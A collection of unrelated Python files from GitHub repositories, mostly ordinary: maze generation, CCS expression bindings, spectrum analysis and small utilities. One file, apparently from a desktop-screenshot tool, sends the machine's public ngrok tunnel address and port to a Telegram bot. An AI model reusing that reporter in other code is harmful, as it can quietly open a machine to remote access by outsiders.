= cell\n start.set_start()\n\n elif not end and cell != start:\n end = cell\n end.set_end()\n\n elif cell != start and cell != end:\n cell.color = YELLOW\n\n # Check right mouse button\n elif pygame.mouse.get_pressed()[2]:\n pos = pygame.mouse.get_pos()\n row, col = window.get_clicked_pos(pos, WIDTH, ROWS)\n cell = g.grid[row][col]\n cell.reset()\n if cell == start:\n start = None\n\n elif cell == end:\n end = None\n\n if event.type == pygame.KEYDOWN:\n # 'C' will reset the grid\n if event.key == pygame.K_c:\n g = grid.Grid(ROWS, COLS, WIDTH)\n\n # 'H' will generate a new maze using the hunt and kill algorithm\n if event.key == pygame.K_h:\n start = None\n end = None\n g = grid.Grid(ROWS, COLS, WIDTH)\n huntandkill.generate(surface, g, True)\n\n # 'B' will generate a new maze using the growing tree algorithm in backtrack mode\n if event.key == pygame.K_b:\n start = None\n end = None\n g = grid.Grid(ROWS, COLS, WIDTH)\n growingtree.generate(surface, g, \"Backtrack\", True)\n\n # 'P' will generate a new maze using the growing tree algorithm in random (Prim's) mode\n if event.key == pygame.K_p:\n start = None\n end = None\n g = grid.Grid(ROWS, COLS, WIDTH)\n growingtree.generate(surface, g, \"Random\", True)\n\n # 'T' will generate a new maze using the binary tree algorithm\n # Available modes are NE, NW, SE, and SW\n if event.key == pygame.K_t:\n start = None\n end = None\n g = grid.Grid(ROWS, COLS, WIDTH)\n binarytree.generate(surface, g, \"NE\", True)\n\n # 'R' will reset the maze (remove solution)\n if event.key == pygame.K_r:\n for row in g.grid:\n for cell in row:\n if cell == start:\n cell.set_start()\n elif cell == end:\n cell.set_end()\n else:\n cell.reset()\n\n # Run A* algorithm to find the shortest path between start and end\n if event.key == pygame.K_SPACE and start != None and end != None:\n for row in g.grid:\n for cell in row:\n cell.update_accessible_neighbors(g.grid)\n solver.run_astar_algo(lambda: window.draw(surface, g.grid), g.grid, start, end, False)\n\n\n pygame.quit()\n\n\n\nmain()\n","repo_name":"sabah-z-ahmad/maze-generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25763045842","text":"import requests\n\n\n\ndef ngrok_send_Telegram():\n try:\n json_request = requests.get(\"http://127.0.0.1:4040/api/tunnels\")\n url = json_request.json()\n ngrok_url= url[\"tunnels\"][0][\"public_url\"].split(\":\")[1].split(\"//\")[1]\n ngrok_port = url[\"tunnels\"][0][\"public_url\"].split(\":\")[2]\n\n\n message = \"\\n Take your Ip and Port\\nIp\\n==> {}\\nPort\\n==> {}\".format(ngrok_url, ngrok_port)\n url = f\"https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text={message}\"\n requests.get(url)\n return \"Good\"\n except:\n return \"Invalid\"\n \n#ngrok_send_Telegram()","repo_name":"Zud0k4t0-SkyDark/screenshot-desktop","sub_path":"settings_packages/comand.py","file_name":"comand.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74843878866","text":"import shutil\nimport sys\nimport os\n\ninfile = os.path.join(os.environ.get('HOME'), '.zshrc')\nif not os.path.exists(infile):\n print(f\"file '{infile}' does not exist\")\n sys.exit(1)\n\nbakfile = f\"{infile }.bak\"\nprint(f\"Will attempt to move '{infile}' to '{bakfile}'\")\n\nos.rename(infile, bakfile)\n\nof = open(infile, 'w')\n\nprint(f\"Will attempt to update the plugins section in '{infile}'\")\n\nwith open(bakfile, 'r') as f:\n for line in f:\n if line.startswith('plugins=(git)'):\n line = 'plugins=(git zsh-syntax-highlighting zsh-autosuggestions)'\n of.write(line)\n\nof.close()\n\nprint(f\"Please execute:\\nsource {infile}\")\n","repo_name":"clinbioinfo/dev-utils","sub_path":"util/update_oh_my_zsh_plugins.py","file_name":"update_oh_my_zsh_plugins.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17235950281","text":"import os\nimport logging\nfrom pathlib import Path\nfrom shutil import unpack_archive\n\nzip_files = Path(r\"D:\\ProjectData\").rglob(\"*.zip\")\nwhile True:\n try:\n path = next(zip_files)\n except StopIteration:\n break # no more files\n except PermissionError:\n logging.exception(\"permission error\")\n else:\n os.remove(path)\n","repo_name":"adsarode/PythonExperiments","sub_path":"Utils/DeleteAllZipFilesInSubDirs.py","file_name":"DeleteAllZipFilesInSubDirs.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12192958722","text":"import yt\nimport os\nfrom pvuLoder import pvuFile\nimport numpy as np\n\n# set the file path \nDataDir=os.path.join(os.environ.get('ASPECTdatadir','./'),'fault_formation')\npFile=os.path.join(DataDir,'solution-00050.pvtu')\nif os.path.isfile(pFile) is False:\n print(f\"data file not found: {pFile}\")\n\n# instantiate our manual pvu loader and load into memory (takes a while!)\npvuData=pvuFile(pFile)\npvuData.load()\n\n# create the yt dataset\nds = yt.load_unstructured_mesh(\n pvuData.connectivity,\n pvuData.coordinates,\n node_data = pvuData.node_data,\n length_unit=\"m\"\n)\n\n# create a couple slices in strain rate: \nsr_cmap = 'magma'\n\nslc = yt.SlicePlot(ds,'x',('all','strain_rate'))\nslc.set_log('strain_rate',True)\nslc.set_cmap(('all','strain_rate'),sr_cmap)\nslc.hide_axes()\nslc.save('../figures/aspect_fault_xsec.png')\n\nc_val = ds.domain_center\nc_arr = np.array([c_val[0],c_val[1],ds.domain_width[2]*0.8])\nslc = yt.SlicePlot(ds,'z',('all','strain_rate'),center=c_arr)\nslc.set_log('strain_rate',True)\nslc.set_cmap(('all','strain_rate'),sr_cmap)\nslc.hide_axes()\nslc.save('../figures/aspect_fault_map.png')\n","repo_name":"chrishavlin/AGU2020","sub_path":"code/aspect_high_res.py","file_name":"aspect_high_res.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30561446322","text":"import subprocess \n\ncache_line = 1024\nblock_size = 8\n\ncache_line_counter = 0\nblock_size_counter = 0\nfor cache_line_counter in range(0,8):\n\tfor block_size_counter in range (0,4):\n\t\tp1 = subprocess.run(f'./sim-cache -cache:il1 il1:256:32:1:l -cache:dl1 dl1:{cache_line}:{block_size}:1:l -cache:il2 dl2 -cache:dl2 ul2:1024:64:4:l ./benchmarks/whetstone',shell =True, stderr = subprocess.PIPE)\n\t\tx= p1.stderr.decode().find('dl1.miss_rate ')\n\t\t#print (\"x = \t\t\t\",p1.stderr.decode()[x:x+100])\n\t\tprint('-------->',cache_line,' ',block_size,' ',p1.stderr.decode()[x:x+35])\n\t\tblock_size = 2*block_size\n\tblock_size = 8\n\n\t\n\tcache_line = 2*cache_line\n\n\t\n\n","repo_name":"mahmoudhassanhamza/PythonScriptForLinux","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12071319675","text":"#!/usr/bin/env python3\nfrom base import *\nimport time\nimport random\nrandom.seed()\n\nfor e in mongodb[\"events\"].find({\"time\":{\"$lte\":time.time()},\"sent\":{\"$exists\":False}}):\n tpls = list(mongodb[\"templates\"].find({\"type\":e[\"type\"]}))\n if len(tpls) > 0:\n msg = random.choice(tpls)[\"msg\"].format_map(e)\n print(msg)\n mongodb[\"events\"].update({\"_id\":e[\"_id\"]},{\"$set\":{\"sent\":time.time()}})\n else:\n print(\"No template of type %s found.\" % e[\"type\"])\n","repo_name":"Freifunk-Potsdam/ffp-monitor","sub_path":"sendmsg.py","file_name":"sendmsg.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"26784368905","text":"import ctypes as ct\nfrom . import libcconfigspace\nfrom .base import Object, Error, Result, CEnumeration, _ccs_get_function, ccs_expression, Datum, DatumFix, ccs_parameter, ccs_context\nfrom .parameter import Parameter\n\nclass ExpressionType(CEnumeration):\n _members_ = [\n ('OR', 0),\n 'AND',\n 'EQUAL',\n 'NOT_EQUAL',\n 'LESS',\n 'GREATER',\n 'LESS_OR_EQUAL',\n 'GREATER_OR_EQUAL',\n 'ADD',\n 'SUBSTRACT',\n 'MULTIPLY',\n 'DIVIDE', \n 'MODULO', \n 'POSITIVE',\n 'NEGATIVE',\n 'NOT',\n 'IN',\n 'LIST',\n 'LITERAL',\n 'VARIABLE' ]\n\nclass AssociativityType(CEnumeration):\n _members_ = [\n ('ASSOCIATIVITY_NONE', 0),\n 'LEFT_TO_RIGHT',\n 'RIGHT_TO_LEFT' ]\n\n_sz_expr = len(ExpressionType._members_)\nccs_expression_precedence = (ct.c_int * _sz_expr).in_dll(libcconfigspace, \"ccs_expression_precedence\")\nccs_expression_associativity = (AssociativityType * _sz_expr).in_dll(libcconfigspace, \"ccs_expression_associativity\")\nccs_expression_symbols = [x.decode() if x else x for x in (ct.c_char_p * _sz_expr).in_dll(libcconfigspace, \"ccs_expression_symbols\")]\nccs_expression_arity = (ct.c_int * _sz_expr).in_dll(libcconfigspace, \"ccs_expression_arity\")\n\nclass TerminalType(CEnumeration):\n _members_ = [\n ('NONE', 0),\n 'TRUE',\n 'FALSE',\n 'STRING',\n 'IDENTIFIER',\n 'INTEGER',\n 'FLOAT' ]\n\n_sz_term = len(TerminalType._members_)\nccs_terminal_precedence = (ct.c_int * _sz_term).in_dll(libcconfigspace, \"ccs_terminal_precedence\")\nccs_terminal_regexp = [x.decode() if x else x for x in (ct.c_char_p * _sz_term).in_dll(libcconfigspace, \"ccs_terminal_regexp\")]\nccs_terminal_symbols = [x.decode() if x else x for x in (ct.c_char_p * _sz_term).in_dll(libcconfigspace, \"ccs_terminal_symbols\")]\n\nccs_create_binary_expression = _ccs_get_function(\"ccs_create_binary_expression\", [ExpressionType, DatumFix, DatumFix, ct.POINTER(ccs_expression)])\nccs_create_unary_expression = _ccs_get_function(\"ccs_create_unary_expression\", [ExpressionType, DatumFix, ct.POINTER(ccs_expression)])\nccs_create_expression = _ccs_get_function(\"ccs_create_expression\", [ExpressionType, ct.c_size_t, ct.POINTER(Datum), ct.POINTER(ccs_expression)])\nccs_create_literal = _ccs_get_function(\"ccs_create_literal\", [DatumFix, ct.POINTER(ccs_expression)])\nccs_create_variable = _ccs_get_function(\"ccs_create_variable\", [ccs_parameter, ct.POINTER(ccs_expression)])\nccs_expression_get_type = _ccs_get_function(\"ccs_expression_get_type\", [ccs_expression, ct.POINTER(ExpressionType)])\nccs_expression_get_num_nodes = _ccs_get_function(\"ccs_expression_get_num_nodes\", [ccs_expression, ct.POINTER(ct.c_size_t)])\nccs_expression_get_nodes = _ccs_get_function(\"ccs_expression_get_nodes\", [ccs_expression, ct.c_size_t, ct.POINTER(ccs_expression), ct.POINTER(ct.c_size_t)])\nccs_literal_get_value = _ccs_get_function(\"ccs_literal_get_value\", [ccs_expression, ct.POINTER(Datum)])\nccs_variable_get_parameter = _ccs_get_function(\"ccs_variable_get_parameter\", [ccs_expression, ct.POINTER(ccs_parameter)])\nccs_expression_eval = _ccs_get_function(\"ccs_expression_eval\", [ccs_expression, ccs_context, ct.POINTER(Datum), ct.POINTER(Datum)])\nccs_expression_list_eval_node = _ccs_get_function(\"ccs_expression_list_eval_node\", [ccs_expression, ccs_context, ct.POINTER(Datum), ct.c_size_t, ct.POINTER(Datum)])\nccs_expression_get_parameters = _ccs_get_function(\"ccs_expression_get_parameters\", [ccs_expression, ct.c_size_t, ct.POINTER(ccs_parameter), ct.POINTER(ct.c_size_t)])\nccs_expression_check_context = _ccs_get_function(\"ccs_expression_check_context\", [ccs_expression, ccs_context])\n\nclass Expression(Object):\n\n @classmethod\n def from_handle(cls, handle, retain = True, auto_release = True):\n v = ExpressionType(0)\n res = ccs_expression_get_type(handle, ct.byref(v))\n Error.check(res)\n v = v.value\n klass = cls.EXPRESSION_MAP[v]\n if klass is None:\n raise Error(Result(Result.ERROR_INVALID_EXPRESSION))\n return klass(handle = handle, retain = retain, auto_release = auto_release)\n\n def _create_binary(self, t, left, right):\n pvleft = Datum(left)\n pvright = Datum(right)\n vleft = DatumFix(pvleft)\n vright = DatumFix(pvright)\n handle = ccs_expression()\n res = ccs_create_binary_expression(t, vleft, vright, ct.byref(handle))\n Error.check(res)\n return handle\n\n def _create_unary(self, t, node):\n pvnode = Datum(node)\n vnode = DatumFix(pvnode)\n handle = ccs_expression()\n res = ccs_create_unary_expression(t, vnode, ct.byref(handle))\n Error.check(res)\n return handle\n\n @property\n def type(self):\n if hasattr(self, \"_type\"):\n return self._type\n v = ExpressionType(0)\n res = ccs_expression_get_type(self.handle, ct.byref(v))\n Error.check(res)\n self._type = v.value\n return self._type\n\n @property\n def num_nodes(self):\n if hasattr(self, \"_num_nodes\"):\n return self._num_nodes\n v = ct.c_size_t(0)\n res = ccs_expression_get_num_nodes(self.handle, ct.byref(v))\n Error.check(res)\n self._num_nodes = v.value\n return self._num_nodes\n\n @property\n def nodes(self):\n if hasattr(self, \"_nodes\"):\n return self._nodes\n sz = self.num_nodes\n v = (ccs_expression * sz)()\n res = ccs_expression_get_nodes(self.handle, sz, v, None)\n Error.check(res)\n self._nodes = [Expression.from_handle(handle = ccs_expression(x)) for x in v]\n return self._nodes\n\n @property\n def parameters(self):\n if hasattr(self, \"_parameters\"):\n return self._parameters\n sz = ct.c_size_t()\n res = ccs_expression_get_parameters(self.handle, 0, None, ct.byref(sz))\n Error.check(res)\n sz = sz.value\n if sz == 0:\n self._parameters = []\n return []\n v = (ccs_parameter * sz.value)()\n res = ccs_expression_get_parameters(self.handle, sz, v, None)\n Error.check(res)\n self._parameters = [Parameter.from_handle(ccs_parameter(x)) for x in v]\n return self._parameters\n\n def eval(self, context = None, values = None):\n if context and values:\n count = context.num_parameters\n if count != len(values):\n raise Error(Result(Result.ERROR_INVALID_VALUE))\n v = (Datum * count)()\n ss = []\n for i in range(count):\n v[i].set_value(values[i], string_store = ss)\n values = v\n context = context.handle\n elif context or values:\n raise Error(Result(Result.ERROR_INVALID_VALUE))\n v = Datum()\n res = ccs_expression_eval(self.handle, context, values, ct.byref(v))\n Error.check(res)\n return v.value\n\n def check_context(self, context):\n res = ccs_expression_check_context(self.handle, context.handle)\n Error.check(res)\n\n def __str__(self):\n t = self.type\n symbol = ccs_expression_symbols[t]\n prec = ccs_expression_precedence[t]\n nds = [\"({})\".format(n) if ccs_expression_precedence[n.type] < prec else n.__str__() for n in self.nodes]\n if len(nds) == 1:\n return \"{}{}\".format(symbol, nds[0])\n else:\n return \"{} {} {}\".format(nds[0], symbol, nds[1])\n\nclass ExpressionOr(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.OR, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Or = ExpressionOr\n\nclass ExpressionAnd(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.AND, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.And = ExpressionAnd\n\nclass ExpressionEqual(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.EQUAL, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Equal = ExpressionEqual\n\nclass ExpressionNotEqual(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.NOT_EQUAL, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.NotEqual = ExpressionNotEqual\n\nclass ExpressionLess(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.LESS, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Less = ExpressionLess\n\nclass ExpressionGreater(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.GREATER, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Greater = ExpressionGreater\n\nclass ExpressionLessOrEqual(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.LESS_OR_EQUAL, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.LessOrEqual = ExpressionLessOrEqual\n\nclass ExpressionGreaterOrEqual(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.GREATER_OR_EQUAL, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.GreaterOrEqual = ExpressionGreaterOrEqual\n\nclass ExpressionAdd(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.ADD, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Add = ExpressionAdd\n\nclass ExpressionSubstract(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.SUBSTRACT, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Substract = ExpressionSubstract\n\nclass ExpressionMultiply(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.MULTIPLY, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Multiply = ExpressionMultiply\n\nclass ExpressionDivide(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.DIVIDE, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Divide = ExpressionDivide\n\nclass ExpressionModulo(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.MODULO, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Modulo = ExpressionModulo\n\nclass ExpressionPositive(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n node = None):\n if handle is None:\n handle = self._create_unary(ExpressionType.POSITIVE, node)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Positive = ExpressionPositive\n\nclass ExpressionNegative(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n node = None):\n if handle is None:\n handle = self._create_unary(ExpressionType.NEGATIVE, node)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Negative = ExpressionNegative\n\nclass ExpressionNot(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n node = None):\n if handle is None:\n handle = self._create_unary(ExpressionType.NOT, node)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.Not = ExpressionNot\n\nclass ExpressionIn(Expression):\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n left = None, right = None):\n if handle is None:\n handle = self._create_binary(ExpressionType.IN, left, right)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n\nExpression.In = ExpressionIn\n\nclass ExpressionLiteral(Expression):\n none_symbol = ccs_terminal_symbols[TerminalType.NONE]\n true_aymbol = ccs_terminal_symbols[TerminalType.TRUE]\n false_symbol = ccs_terminal_symbols[TerminalType.FALSE]\n\n def __init__(self, handle = None, retain = False, auto_release = True,\n value = None):\n if handle is None:\n handle = ccs_expression()\n pv = Datum(value)\n v = DatumFix(pv)\n res = ccs_create_literal(v, ct.byref(handle))\n Error.check(res)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n \n @property \n def value(self):\n if hasattr(self, \"_value\"):\n return self._value\n v = Datum()\n res = ccs_literal_get_value(self.handle, ct.byref(v))\n Error.check(res)\n self._value = v.value\n return self._value\n \n def __str__(self):\n v = self.value\n if isinstance(v, str):\n return repr(v)\n elif v is None:\n return ExpressionLiteral.none_symbol\n elif v is True:\n return ExpressionLiteral.true_aymbol\n elif v is False:\n return ExpressionLiteral.false_symbol\n else:\n return \"{}\".format(v)\n\nExpression.Literal = ExpressionLiteral\n\nclass ExpressionVariable(Expression):\n def __init__(self, handle = None, retain = False, auto_release = True,\n parameter = None):\n if handle is None:\n handle = ccs_expression()\n res = ccs_create_variable(parameter.handle, ct.byref(handle))\n Error.check(res)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n \n @property \n def parameter(self):\n if hasattr(self, \"_parameter\"):\n return self._parameter\n v = ccs_parameter()\n res = ccs_variable_get_parameter(self.handle, ct.byref(v))\n Error.check(res)\n self._parameter = Parameter.from_handle(v)\n return self._parameter\n \n def __str__(self):\n return self.parameter.name\n\nExpression.Variable = ExpressionVariable\n\nclass ExpressionList(Expression):\n def __init__(self, handle = None, retain = False, auto_release = True,\n values = []):\n if handle is None:\n sz = len(values)\n handle = ccs_expression()\n v = (Datum*sz)()\n ss = []\n for i in range(sz):\n v[i].set_value(values[i], string_store = ss)\n res = ccs_create_expression(ExpressionType.LIST, sz, v, ct.byref(handle))\n Error.check(res)\n super().__init__(handle = handle, retain = False)\n else:\n super().__init__(handle = handle, retain = retain, auto_release = auto_release)\n \n def eval(self, index, context = None, values = None):\n if context and values:\n count = context.num_parameters\n if count != len(values):\n raise Error(Result(Result.ERROR_INVALID_VALUE))\n v = (Datum * count)()\n ss = []\n for i in range(count):\n v[i].set_value(values[i], string_store = ss)\n values = v\n context = context.handle\n elif context or values:\n raise Error(Result(Result.ERROR_INVALID_VALUE))\n v = Datum()\n res = ccs_expression_list_eval_node(self.handle, context, values, index, ct.byref(v))\n Error.check(res)\n return v.value\n\n def __str__(self):\n return \"[ {} ]\".format(\", \".join(map(str, self.nodes)))\n\nExpression.List = ExpressionList\n\nsetattr(Expression, 'EXPRESSION_MAP', {\n ExpressionType.OR: ExpressionOr,\n ExpressionType.AND: ExpressionAnd,\n ExpressionType.EQUAL: ExpressionEqual,\n ExpressionType.NOT_EQUAL: ExpressionNotEqual,\n ExpressionType.LESS: ExpressionLess,\n ExpressionType.GREATER: ExpressionGreater,\n ExpressionType.LESS_OR_EQUAL: ExpressionLessOrEqual,\n ExpressionType.GREATER_OR_EQUAL: ExpressionGreaterOrEqual,\n ExpressionType.ADD: ExpressionAdd,\n ExpressionType.SUBSTRACT: ExpressionSubstract,\n ExpressionType.MULTIPLY: ExpressionMultiply,\n ExpressionType.DIVIDE: ExpressionDivide,\n ExpressionType.MODULO: ExpressionModulo,\n ExpressionType.POSITIVE: ExpressionPositive,\n ExpressionType.NEGATIVE: ExpressionNegative,\n ExpressionType.NOT: ExpressionNot,\n ExpressionType.IN: ExpressionIn,\n ExpressionType.LIST: ExpressionList,\n ExpressionType.LITERAL: ExpressionLiteral,\n ExpressionType.VARIABLE: ExpressionVariable,\n})\n","repo_name":"argonne-lcf/CCS","sub_path":"bindings/python/cconfigspace/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":18666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24143329510","text":"from typing import Optional, TypeVar, Union, Type\r\n\r\nimport numpy as np\r\nfrom numpy.typing import NDArray\r\n\r\nfrom ..config import Config\r\nfrom .math_relation import Relation\r\nfrom .defaults.base_structures import ConvertingError\r\n\r\n\r\nNum = Union[float, int, complex]\r\nR = TypeVar(\"R\", bound=Relation)\r\nSP = TypeVar(\"SP\", bound=\"Spectrum\")\r\nS = TypeVar(\"S\", bound=\"Signal\")\r\nSPRN = Union[\"Spectrum\", \"Relation\", Num]\r\nSSPR = Union[\"Spectrum\", \"Signal\", \"Relation\"]\r\nSSPRN = Union[\"Spectrum\", \"Signal\", \"Relation\", Num]\r\n\r\n\r\ndef _input2spectrum_operation(inp: SSPRN) -> Union[\"Relation\", \"Spectrum\", Num]:\r\n if isinstance(inp, Signal):\r\n return inp.get_spectrum()\r\n elif isinstance(inp, (Spectrum, Relation, int, float, complex)):\r\n return inp\r\n else:\r\n raise ConvertingError(type(inp), Spectrum)\r\n\r\n\r\ndef _input2spectrum(inp: SSPR) -> \"Spectrum\":\r\n if isinstance(inp, Signal):\r\n return inp.get_spectrum()\r\n\r\n elif isinstance(inp, Spectrum):\r\n return inp\r\n\r\n elif isinstance(inp, Relation):\r\n return Spectrum(inp)\r\n else:\r\n raise ConvertingError(type(inp), Spectrum)\r\n\r\n\r\nclass Spectrum(Relation):\r\n \"\"\"A class that describes the Fourier spectrum of a signal.\r\n\r\n The `Spectrun` class derived from the `Relation` class.\r\n\r\n **Properties**:\r\n\r\n > **frequency**: `Union[Relation, NDArray]`\r\n An instance of Relation class or inherited from it, or array_like object\r\n containing numbers (real or complex).\r\n\r\n > **spectrum_amplitude**: `Oprional[NDArray]`\r\n None or array_like object containing numbers (real or complex).\r\n\r\n > **df**: `float` = `None`\r\n Sample rate of frequency-axis\r\n\r\n To convert the spectrum into a signal, the method defined in the Config\r\n class is used. (Config.spectrum2signal_method). Current method can be\r\n overridden by own in `Config` class.\r\n\r\n When performing arithmetic operations on instances of the `Signal` class,\r\n an instance of the `Spectrum` class will be extracted from\r\n the `Signal` instance, and arithmetic operations will be performed\r\n on this instance. An instance of `Relation` class will be converted into\r\n the instance of `Spectrum` class.\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n frequency: Union[Relation, NDArray],\r\n spectrum_amplitude: NDArray = None,\r\n df: float = None,\r\n **kwargs\r\n ) -> None:\r\n super().__init__(frequency, spectrum_amplitude, df)\r\n self._spectrum2signal_method_default = Config.spectrum2signal_method\r\n self.signal: Optional[Signal] = None\r\n\r\n @property\r\n def frequency(self):\r\n return self.x\r\n\r\n @property\r\n def spectrum_amplitude(self):\r\n return self.y\r\n\r\n @property\r\n def df(self):\r\n return self.dx\r\n\r\n @df.setter\r\n def df(self, value: float):\r\n self.dx = value\r\n\r\n def get_signal(self, recalculate=False, start_time: float = None) -> \"Signal\":\r\n \"\"\"Compute the signal from the spectrum.\"\"\"\r\n\r\n if self.signal is None or recalculate:\r\n time, amplitude = self._spectrum2signal_method_default(\r\n self._x, self._y, start_time\r\n )\r\n self.signal = Signal(time, amplitude)\r\n return self.signal\r\n\r\n def get_amp_spectrum(self: R, **kwargs) -> \"Relation\":\r\n \"\"\"Amplitude spectrum.\r\n\r\n Calculate the relationship between the frequency and the absolute\r\n value of the spectrum amplitude.\"\"\"\r\n\r\n x, y = self.get_data()\r\n return Relation(x, np.abs(y))\r\n\r\n def get_phase_spectrum(self: R, **kwargs) -> \"Relation\":\r\n \"\"\"Calculate the relationship between frequency and phase of the spectrum.\"\"\"\r\n x, y = self.get_data()\r\n return Relation(x, np.unwrap(np.angle(y)))\r\n\r\n def get_reverse_filter(\r\n self: SP,\r\n percent: Union[float, int] = 5.0,\r\n subtrack_phase=True,\r\n frequency_start: float = None,\r\n frequency_end: float = None,\r\n **kwargs\r\n ) -> SP:\r\n \"\"\"Calculate filter of reversed signal.\r\n\r\n **Properties**:\r\n > **percent**: `Union[float, int]`\r\n level of added white noise in percent\r\n\r\n **subtrack_phase**: True\r\n If True performs phase subtraction,\r\n If False succeeds, add the phase.\r\n\r\n **frequency_start**: `float`**\r\n Start frequency.\r\n\r\n **frequency_end**: `float`\r\n End frequency.\r\n\r\n \"\"\"\r\n spectrum = self.select_data(frequency_start, frequency_end)\r\n abs_spectrum = spectrum.get_amp_spectrum()\r\n abs_spectrum = abs_spectrum + abs_spectrum.max() * percent / 100\r\n reversed_abs_spectrum = 1 / abs_spectrum\r\n\r\n if subtrack_phase:\r\n phase_spectrum = -1 * spectrum.get_phase_spectrum()\r\n else:\r\n phase_spectrum = 1 * spectrum.get_phase_spectrum()\r\n\r\n result_spectrum = type(self).get_spectrum_from_amp_phase(\r\n reversed_abs_spectrum, phase_spectrum, **kwargs\r\n )\r\n return result_spectrum\r\n\r\n def add_phase(self: SP, other: SSPR, **kwargs) -> SP:\r\n sp_other = _input2spectrum(other)\r\n return type(self).get_spectrum_from_amp_phase(\r\n self.get_amp_spectrum(),\r\n self.get_phase_spectrum() + sp_other.get_phase_spectrum(),\r\n **kwargs\r\n )\r\n\r\n def sub_phase(self: SP, other: SSPR, **kwargs) -> SP:\r\n sp_other = _input2spectrum(other)\r\n return type(self).get_spectrum_from_amp_phase(\r\n 